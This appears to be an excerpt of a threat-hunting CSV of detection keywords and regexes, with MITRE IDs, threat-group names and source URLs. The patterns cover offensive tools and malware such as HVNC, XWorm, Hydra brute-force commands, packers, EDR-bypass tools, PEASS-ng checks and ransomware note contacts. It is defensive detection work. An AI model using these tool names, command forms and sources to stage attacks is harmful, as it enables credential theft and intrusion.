"*HVNC Server.exe*",".{0,1000}HVNC\sServer\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","Hidden Desktop (often referred to as HVNC) is a tool that allows operators to interact with a remote desktop session without the user knowing. The VNC protocol is not involved but the result is a similar experience. This Cobalt Strike BOF implementation was created as an alternative to TinyNuke/forks that are written in C++","T1021.001 - T1133","TA0005 - TA0002","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/WKL-Sec/HiddenDesktop","1","0","N/A","N/A","10","10","1213","187","2023-12-07T17:15:48Z","2023-05-21T00:57:43Z","48067"
"*HVNC.Properties*",".{0,1000}HVNC\.Properties.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","0","N/A","N/A","10","","N/A","","","","48068"
"*HVNC\ Server*",".{0,1000}HVNC\\\sServer.{0,1000}","offensive_tool_keyword","cobaltstrike","Hidden Desktop (often referred to as HVNC) is a tool that allows operators to interact with a remote desktop session without the user knowing. The VNC protocol is not involved but the result is a similar experience. This Cobalt Strike BOF implementation was created as an alternative to TinyNuke/forks that are written in C++","T1021.001 - T1133","TA0005 - TA0002","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/WKL-Sec/HiddenDesktop","1","0","N/A","N/A","10","10","1213","187","2023-12-07T17:15:48Z","2023-05-21T00:57:43Z","48069"
"*hXOR-Packer.v0.1.zip*",".{0,1000}hXOR\-Packer\.v0\.1\.zip.{0,1000}","offensive_tool_keyword","hXOR-Packer","hXOR Packer is a PE (Portable Executable) packer with Huffman Compression and Xor encryption.","T1027 - T1048.003 - T1140 - T1205.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/akuafif/hXOR-Packer","1","1","N/A","N/A","9","1","57","14","2021-09-11T13:00:34Z","2020-11-19T14:57:03Z","48070"
"*hXOR-Packer-main*",".{0,1000}hXOR\-Packer\-main.{0,1000}","offensive_tool_keyword","hXOR-Packer","hXOR Packer is a PE (Portable Executable) packer with Huffman Compression and Xor encryption.","T1027 - T1048.003 - T1140 - T1205.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/akuafif/hXOR-Packer","1","0","N/A","N/A","9","1","57","14","2021-09-11T13:00:34Z","2020-11-19T14:57:03Z","48071"
"*hxt254aygrsziejn.onion*",".{0,1000}hxt254aygrsziejn\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","48072"
"*hydra * ftp://*",".{0,1000}hydra\s.{0,1000}\sftp\:\/\/.{0,1000}","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","ALLANITE - BERSERK BEAR","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","0","#linux","N/A","N/A","10","10326","2137","2025-04-04T12:19:05Z","2014-04-24T14:45:37Z","48073"
"*hydra * http-post-form *",".{0,1000}hydra\s.{0,1000}\shttp\-post\-form\s.{0,1000}","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","ALLANITE - BERSERK BEAR","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","0","#linux","N/A","N/A","10","10326","2137","2025-04-04T12:19:05Z","2014-04-24T14:45:37Z","48074"
"*hydra * mysql://*",".{0,1000}hydra\s.{0,1000}\smysql\:\/\/.{0,1000}","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","ALLANITE - BERSERK BEAR","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","0","#linux","N/A","N/A","10","10326","2137","2025-04-04T12:19:05Z","2014-04-24T14:45:37Z","48075"
"*hydra * ssh://*",".{0,1000}hydra\s.{0,1000}\sssh\:\/\/.{0,1000}","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","ALLANITE - BERSERK BEAR","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","0","#linux","N/A","N/A","10","10326","2137","2025-04-04T12:19:05Z","2014-04-24T14:45:37Z","48076"
"*hydra * telnet://*",".{0,1000}hydra\s.{0,1000}\stelnet\:\/\/.{0,1000}","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","ALLANITE - BERSERK BEAR","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","0","#linux","N/A","N/A","10","10326","2137","2025-04-04T12:19:05Z","2014-04-24T14:45:37Z","48077"
"*hydra smtp-enum*",".{0,1000}hydra\ssmtp\-enum.{0,1000}","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","ALLANITE - BERSERK BEAR","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","0","#linux","N/A","N/A","10","10326","2137","2025-04-04T12:19:05Z","2014-04-24T14:45:37Z","48078"
"*hydra:x:10001:*",".{0,1000}hydra\:x\:10001\:.{0,1000}","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","ALLANITE - BERSERK BEAR","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","0","#linux","N/A","N/A","10","10326","2137","2025-04-04T12:19:05Z","2014-04-24T14:45:37Z","48079"
"*HYDRA_PROXY_HTTP*",".{0,1000}HYDRA_PROXY_HTTP.{0,1000}","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","ALLANITE - BERSERK BEAR","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","0","#linux","N/A","N/A","10","10326","2137","2025-04-04T12:19:05Z","2014-04-24T14:45:37Z","48080"
"*hydra-cobaltstrike*",".{0,1000}hydra\-cobaltstrike.{0,1000}","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","ALLANITE - BERSERK BEAR","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","1","#linux","N/A","N/A","10","10326","2137","2025-04-04T12:19:05Z","2014-04-24T14:45:37Z","48081"
"*Hyperion PE-Crypter*",".{0,1000}Hyperion\sPE\-Crypter.{0,1000}","offensive_tool_keyword","hyperion","A runtime PE-Crypter - The crypter is started via the command line and encrypts an input executable with AES-128. The encrypted file decrypts itself on startup (bruteforcing the AES key which may take a few seconds)","T1027.002 - T1059.001 - T1116","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://www.kali.org/tools/hyperion/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","48082"
"*hyperion.exe *",".{0,1000}hyperion\.exe\s.{0,1000}","offensive_tool_keyword","hyperion","A runtime PE-Crypter - The crypter is started via the command line and encrypts an input executable with AES-128. The encrypted file decrypts itself on startup (bruteforcing the AES key which may take a few seconds)","T1027.002 - T1059.001 - T1116","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://www.kali.org/tools/hyperion/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","48083"
"*hyperion.exe *.exe* *.exe*",".{0,1000}hyperion\.exe\s.{0,1000}\.exe.{0,1000}\s.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","packer bundled","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","48084"
"*hyperion_2.0.orig.tar.gz*",".{0,1000}hyperion_2\.0\.orig\.tar\.gz.{0,1000}","offensive_tool_keyword","hyperion","A runtime PE-Crypter - The crypter is started via the command line and encrypts an input executable with AES-128. The encrypted file decrypts itself on startup (bruteforcing the AES key which may take a few seconds)","T1027.002 - T1059.001 - T1116","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://www.kali.org/tools/hyperion/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","48085"
"*Hyper-V-Hypervisor-Downgrade/Config.xml*",".{0,1000}Hyper\-V\-Hypervisor\-Downgrade\/Config\.xml.{0,1000}","offensive_tool_keyword","WindowsDowndate","A tool that takes over Windows Updates to craft custom downgrades and expose past fixed vulnerabilities","T1072 - T1486 - T1505.002 - T1495 - T1499.004","TA0005 - TA0004 - TA0003 ","N/A","N/A","Defense Evasion","https://github.com/SafeBreach-Labs/WindowsDowndate","1","1","N/A","N/A","10","7","663","88","2024-10-26T10:18:49Z","2024-01-08T19:42:47Z","48088"
"*Hypnos-main.zip*",".{0,1000}Hypnos\-main\.zip.{0,1000}","offensive_tool_keyword","Hypnos","indirect syscalls - the Win API functions are not hooked by AV/EDR - bypass EDR detections","T1055.012 - T1136.001 - T1070.004 - T1055.001","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://github.com/CaptainNox/Hypnos","1","1","N/A","N/A","10","1","49","6","2024-02-12T17:51:24Z","2023-07-11T09:07:10Z","48089"
"*hypobrychium.exe*",".{0,1000}hypobrychium\.exe.{0,1000}","offensive_tool_keyword","hypobrychium","hypobrychium AV/EDR Bypass","T1562.001 - T1070.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/foxlox/hypobrychium","1","1","N/A","N/A","8","1","72","21","2023-07-21T21:13:20Z","2023-07-18T09:55:07Z","48091"
"*hypobrychium-main*",".{0,1000}hypobrychium\-main.{0,1000}","offensive_tool_keyword","hypobrychium","hypobrychium AV/EDR Bypass","T1562.001 - T1070.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/foxlox/hypobrychium","1","1","N/A","N/A","8","1","72","21","2023-07-21T21:13:20Z","2023-07-18T09:55:07Z","48092"
"*I am not a robot - reCAPTCHA Verification ID: 2165*",".{0,1000}I\sam\snot\sa\srobot\s\-\sreCAPTCHA\sVerification\sID\:\s2165.{0,1000}","offensive_tool_keyword","recaptcha-phish","Phishing with a fake reCAPTCHA","T1566.001 - T1204.002 - T1071.003","TA0001 - TA0002","Lumma Stealer","N/A","Phishing","https://github.com/JohnHammond/recaptcha-phish","1","0","N/A","N/A","10","6","534","104","2024-09-13T11:18:29Z","2024-09-13T07:00:40Z","48093"
"*I am not a robot - reCAPTCHA Verification ID: 3029*",".{0,1000}I\sam\snot\sa\srobot\s\-\sreCAPTCHA\sVerification\sID\:\s3029.{0,1000}","offensive_tool_keyword","recaptcha-phish","Phishing with a fake reCAPTCHA","T1566.001 - T1204.002 - T1071.003","TA0001 - TA0002","Lumma Stealer","N/A","Phishing","https://github.com/JohnHammond/recaptcha-phish","1","0","N/A","N/A","10","6","534","104","2024-09-13T11:18:29Z","2024-09-13T07:00:40Z","48094"
"*I am not a robot - reCAPTCHA Verification ID: 4202*",".{0,1000}I\sam\snot\sa\srobot\s\-\sreCAPTCHA\sVerification\sID\:\s4202.{0,1000}","offensive_tool_keyword","recaptcha-phish","Phishing with a fake reCAPTCHA","T1566.001 - T1204.002 - T1071.003","TA0001 - TA0002","Lumma Stealer","N/A","Phishing","https://github.com/JohnHammond/recaptcha-phish","1","0","N/A","N/A","10","6","534","104","2024-09-13T11:18:29Z","2024-09-13T07:00:40Z","48095"
"*I am not a robot - reCAPTCHA Verification ID: 7537*",".{0,1000}I\sam\snot\sa\srobot\s\-\sreCAPTCHA\sVerification\sID\:\s7537.{0,1000}","offensive_tool_keyword","recaptcha-phish","Phishing with a fake reCAPTCHA","T1566.001 - T1204.002 - T1071.003","TA0001 - TA0002","Lumma Stealer","N/A","Phishing","https://github.com/JohnHammond/recaptcha-phish","1","0","N/A","N/A","10","6","534","104","2024-09-13T11:18:29Z","2024-09-13T07:00:40Z","48096"
"*I am not a robot - reCAPTCHA Verification ID: 7624*",".{0,1000}I\sam\snot\sa\srobot\s\-\sreCAPTCHA\sVerification\sID\:\s7624.{0,1000}","offensive_tool_keyword","recaptcha-phish","Phishing with a fake reCAPTCHA","T1566.001 - T1204.002 - T1071.003","TA0001 - TA0002","Lumma Stealer","N/A","Phishing","https://github.com/JohnHammond/recaptcha-phish","1","0","N/A","N/A","10","6","534","104","2024-09-13T11:18:29Z","2024-09-13T07:00:40Z","48097"
"*I am not a robot - reCAPTCHA Verification ID: 93752*",".{0,1000}I\sam\snot\sa\srobot\s\-\sreCAPTCHA\sVerification\sID\:\s93752.{0,1000}","offensive_tool_keyword","recaptcha-phish","Phishing with a fake reCAPTCHA","T1566.001 - T1204.002 - T1071.003","TA0001 - TA0002","Lumma Stealer","N/A","Phishing","https://github.com/JohnHammond/recaptcha-phish","1","0","N/A","N/A","10","6","534","104","2024-09-13T11:18:29Z","2024-09-13T07:00:40Z","48098"
"*I need roooot. Unable to open *",".{0,1000}I\sneed\sroooot\.\sUnable\sto\sopen\s.{0,1000}","offensive_tool_keyword","RITM","python Man in the middle ","T1557.002 - T1040 - T1098.002 - T1557.001 - T1552.001","TA0006 - TA0007 - TA0009 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/Tw1sm/RITM","1","0","N/A","N/A","9","3","292","27","2024-11-20T14:27:24Z","2022-10-05T01:10:33Z","48099"
"*I wasn't able to open the hosts file, maybe because UAC is enabled in remote computer!*",".{0,1000}I\swasn\'t\sable\sto\sopen\sthe\shosts\sfile,\smaybe\sbecause\sUAC\sis\senabled\sin\sremote\scomputer!.{0,1000}","offensive_tool_keyword","Fynloski Backdoor","Backdoor Fynloski also knownn as Darkcoment - allows attackers to control the infected system and install other malware remotely","T1105 - T1071 - T1219 - T1059 - T1203 - T1056 - T1113","TA0011 - TA0009 - TA0010 - TA0008 - TA0002 - TA0005","N/A","N/A","Malware","https://www.hybrid-analysis.com/sample/43b40a12a966313f889c338e07239a42af67a69745507e45c4e899bcfa913b81/5a3d55d27ca3e1257f7044f3","1","0","N/A","N/A","7","7","N/A","N/A","N/A","N/A","48100"
"*I2lmbmRlZiBQSU5HT09SCiNkZWZpbmUgUElOR09PUgoKI2RlZmluZSBTRVJWRVJJUCAiM*",".{0,1000}I2lmbmRlZiBQSU5HT09SCiNkZWZpbmUgUElOR09PUgoKI2RlZmluZSBTRVJWRVJJUCAiM.{0,1000}","offensive_tool_keyword","D3m0n1z3dShell","Demonized Shell is an Advanced Tool for persistence in linux","T1098 - T1543.003 - T1547 - T1053.005 - T1546.004 - T1548.003 - T1014 - T1055.001 - T1105 - T1574.006 - T1003 - T1057 - T1055 - T1027 - T1497.001 - T1037.004 - T1037","TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/MatheuZSecurity/D3m0n1z3dShell","1","0","#linux","N/A","10","4","373","54","2025-01-05T13:56:51Z","2023-05-30T02:30:47Z","48101"
"*I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8dW5pc3RkLmg+DQojaW5jbHVkZSA8bmV0ZGIuaD4NCiNpbmNsdWRlIDxzdGRsaWI*",".{0,1000}I2luY2x1ZGUgPHN0ZGlvLmg\+DQojaW5jbHVkZSA8c3RyaW5nLmg\+DQojaW5jbHVkZSA8dW5pc3RkLmg\+DQojaW5jbHVkZSA8bmV0ZGIuaD4NCiNpbmNsdWRlIDxzdGRsaWI.{0,1000}","offensive_tool_keyword","wso-webshell","wso php webshell","T1100 - T1027 - T1059","TA0003 ","N/A","EMBER BEAR - Sandworm","Persistence","https://github.com/mIcHyAmRaNe/wso-webshell","1","0","#content","N/A","10","4","376","211","2024-07-08T04:54:36Z","2017-05-04T23:34:02Z","48102"
"*i2pinstall*",".{0,1000}i2pinstall.{0,1000}","offensive_tool_keyword","I2P","I2P - The Invisible Internet Project.","T1048.001 - T1568.003","TA0011 - TA0040","N/A","N/A","Data Exfiltration","https://geti2p.net/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","48103"
"*IAAgACAAIAB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQA7AA0ACgAgACAAIAAgAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzADsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABjAGwAYQBzAHMAIABMAFMAQQBTAFMARAB1AG0AcAA*",".{0,1000}IAAgACAAIAB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQA7AA0ACgAgACAAIAAgAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzADsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABjAGwAYQBzAHMAIABMAFMAQQBTAFMARAB1AG0AcAA.{0,1000}","offensive_tool_keyword","Lsassx","Dumping LSASS Evaded Endpoint Security Solutions","T1003.001 - T1055.001 - T1203 - T1027 - T1070.004 - T1140 - T1564.001","TA0006 - TA0005 - TA0004","N/A","N/A","Credential Access","https://github.com/yehia-mamdouh/Lsassx","1","0","#base64","N/A","10","1","12","3","2025-02-15T16:41:38Z","2025-02-15T16:36:27Z","48104"
"*iam__enum_assume_role/default-word-list.txt*",".{0,1000}iam__enum_assume_role\/default\-word\-list\.txt.{0,1000}","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","Scattered Spider*","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","N/A","9","10","4651","731","2025-03-20T21:08:57Z","2018-06-13T21:58:59Z","48105"
"*iamaduck7@onionmail.org*",".{0,1000}iamaduck7\@onionmail\.org.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","#email","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","48106"
"*iAmAnIndependentStrongPassswordThatNeedsToBeSecure*",".{0,1000}iAmAnIndependentStrongPassswordThatNeedsToBeSecure.{0,1000}","offensive_tool_keyword","gocrack","GoCrack is a management frontend for password cracking tools written in Go","T1110 - T1021.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/mandiant/gocrack","1","0","N/A","N/A","9","10","1233","242","2025-04-14T16:20:05Z","2017-10-23T14:43:59Z","48107"
"*I-Am-Jakoby/ShellSync*",".{0,1000}I\-Am\-Jakoby\/ShellSync.{0,1000}","offensive_tool_keyword","ShellSync","exposing a server with suspicious scripts and executable from I-Am-Jakoby","T1059.003 - T1100  - T1027","TA0005 - TA0009 - TA0011 ","N/A","N/A","Data Exfiltration","https://github.com/I-Am-Jakoby/ShellSync","1","1","N/A","N/A","5","1","20","7","2023-11-08T18:01:18Z","2023-11-06T06:05:11Z","48108"
"*iamlordvoldemort@31337schoolofhackingandwizardry.com*",".{0,1000}iamlordvoldemort\@31337schoolofhackingandwizardry\.com.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1059.007 - T1087.001 - T1078.001 - T1585.001 - T1071.001","TA0002 - TA0003 - TA0008 - TA0011","N/A","N/A","Exploitation tool","https://github.com/dafthack/GraphRunner","1","0","#email","N/A","10","10","1082","127","2024-11-07T04:40:34Z","2023-08-15T17:19:11Z","48109"
"*iammaguire/Gotato*",".{0,1000}iammaguire\/Gotato.{0,1000}","offensive_tool_keyword","Gotato","Generic impersonation and privilege escalation with Golang. Like GenericPotato both named pipes and HTTP are supported.","T1003.003 - T1056.002 - T1550.001 - T1090","TA0005 - TA0004 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/iammaguire/Gotato","1","1","N/A","N/A","9","2","112","16","2021-06-07T21:19:58Z","2021-06-05T22:32:48Z","48110"
"*iangshan@360RedTeam*",".{0,1000}iangshan\@360RedTeam.{0,1000}","offensive_tool_keyword","WMIHACKER","Bypass anti-virus software lateral movement command execution test tool - No need 445 Port","T1047 - T1569.002 - T1218 - T1036.005","TA0008 - TA0002 - TA0005","N/A","N/A","Lateral Movement","https://github.com/rootclay/WMIHACKER","1","0","#content","N/A","9","10","1423","236","2025-01-20T15:37:28Z","2020-07-02T06:57:25Z","48111"
"*IAS -Process *aad3b435b51404eeaad3b435b51404ee*",".{0,1000}IAS\s\-Process\s.{0,1000}aad3b435b51404eeaad3b435b51404ee.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003 - T1621","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","N/A","10","10","954","108","2025-03-11T14:38:50Z","2023-06-20T16:57:27Z","48112"
"*IAS -Process {GNLPH}*$excludedUsernames=@(""Guest*DefaultAccount*WDAGUtilityAccount*",".{0,1000}IAS\s\-Process\s\{GNLPH\}.{0,1000}\$excludedUsernames\=\@\(\""Guest.{0,1000}DefaultAccount.{0,1000}WDAGUtilityAccount.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003 - T1621","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","N/A","10","10","954","108","2025-03-11T14:38:50Z","2023-06-20T16:57:27Z","48113"
"*ibmiscanner2john.py*",".{0,1000}ibmiscanner2john\.py.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","48114"
"*ibnejdfjmmkpcnlpebklmnkoeoihofec*",".{0,1000}ibnejdfjmmkpcnlpebklmnkoeoihofec.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","N/A","10","2","118","86","2024-10-20T18:38:53Z","2022-11-20T19:11:00Z","48115"
"*IBurpExtender.java*",".{0,1000}IBurpExtender\.java.{0,1000}","offensive_tool_keyword","burpsuite","CO2 is a project for lightweight and useful enhancements to Portswigger popular Burp Suite web penetration tool through the standard Extender API","T1583 - T1595 - T1190","TA0001 - TA0002 - TA0009","N/A","Black Basta","Exploitation tool","https://github.com/JGillam/burp-co2","1","1","N/A","network exploitation tool","N/A","2","152","34","2024-02-21T02:23:00Z","2015-04-19T03:38:34Z","48116"
"*IBurpExtenderCallbacks.java*",".{0,1000}IBurpExtenderCallbacks\.java.{0,1000}","offensive_tool_keyword","burpsuite","CO2 is a project for lightweight and useful enhancements to Portswigger popular Burp Suite web penetration tool through the standard Extender API","T1583 - T1595 - T1190","TA0010 - TA0007 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/JGillam/burp-co2","1","1","N/A","network exploitation tool","N/A","2","152","34","2024-02-21T02:23:00Z","2015-04-19T03:38:34Z","48117"
"*icacls ""%appdata%\Microsoft\Windows\Start Menu\Programs\Startup"" 2>nul*",".{0,1000}icacls\s\""\%appdata\%\\Microsoft\\Windows\\Start\sMenu\\Programs\\Startup\""\s2\>nul.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","N/A","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","48119"
"*icacls ""%programdata%\Microsoft\Windows\Start Menu\Programs\Startup"" 2>nul*",".{0,1000}icacls\s\""\%programdata\%\\Microsoft\\Windows\\Start\sMenu\\Programs\\Startup\""\s2\>nul.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","N/A","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","48121"
"*icacls ""%programdata%\Microsoft\Windows\Start Menu\Programs\Startup\*"" 2>nul*",".{0,1000}icacls\s\""\%programdata\%\\Microsoft\\Windows\\Start\sMenu\\Programs\\Startup\\.{0,1000}\""\s2\>nul.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","N/A","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","48123"
"*icacls ""C:\Documents and Settings\%username%\Start Menu\Programs\Startup"" 2>nul*",".{0,1000}icacls\s\""C\:\\Documents\sand\sSettings\\\%username\%\\Start\sMenu\\Programs\\Startup\""\s2\>nul.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","N/A","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","48125"
"*icacls ""C:\Documents and Settings\%username%\Start Menu\Programs\Startup\*"" 2>nul*",".{0,1000}icacls\s\""C\:\\Documents\sand\sSettings\\\%username\%\\Start\sMenu\\Programs\\Startup\\.{0,1000}\""\s2\>nul.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","N/A","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","48127"
"*icacls ""C:\Documents and Settings\All Users\Start Menu\Programs\Startup"" 2>nul*",".{0,1000}icacls\s\""C\:\\Documents\sand\sSettings\\All\sUsers\\Start\sMenu\\Programs\\Startup\""\s2\>nul.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","N/A","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","48129"
"*icacls ""C:\Documents and Settings\All Users\Start Menu\Programs\Startup\*"" 2>nul*",".{0,1000}icacls\s\""C\:\\Documents\sand\sSettings\\All\sUsers\\Start\sMenu\\Programs\\Startup\\.{0,1000}\""\s2\>nul.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","N/A","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","48131"
